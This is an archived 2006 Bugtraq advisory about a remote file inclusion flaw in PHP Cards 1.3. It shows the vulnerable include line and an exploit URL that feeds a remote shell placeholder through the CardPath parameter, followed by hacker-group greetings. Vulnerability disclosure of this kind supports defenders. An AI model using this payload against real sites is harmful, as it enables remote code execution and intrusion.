lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061013010450.8935.qmail@securityfocus.com>
Date: 13 Oct 2006 01:04:50 -0000
From: Le.CoPrA@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Cards <= 1.3  Remote File Inclue Vulnerability

=====================================================================

  # PHP Cards <= 1.3  Remote File Inclue Vulnerability

=====================================================================

  # Author : Le CoPrA

=====================================================================

  # Download Script : http://www.s3hr.com/PHP Cards 1.3.zip

=====================================================================
  
  # Bug in : phpCards.header.php

  # Vuln Code :

                
include "$CardPath"


 =====================================================================

  # Exploit :

          http://www.victim.com/[path]/phpCards.header.php?CardPath=|SHELL|?

 =====================================================================

   # Discovered by : Le CoPrA

   # ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

   # Special Greetz FlyinG 2 || Str0ke , xoron , mdx ||

   # Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY

   # Channel : wWw.TrYaG.cOm/vb  || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

===========================================================================================================================


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ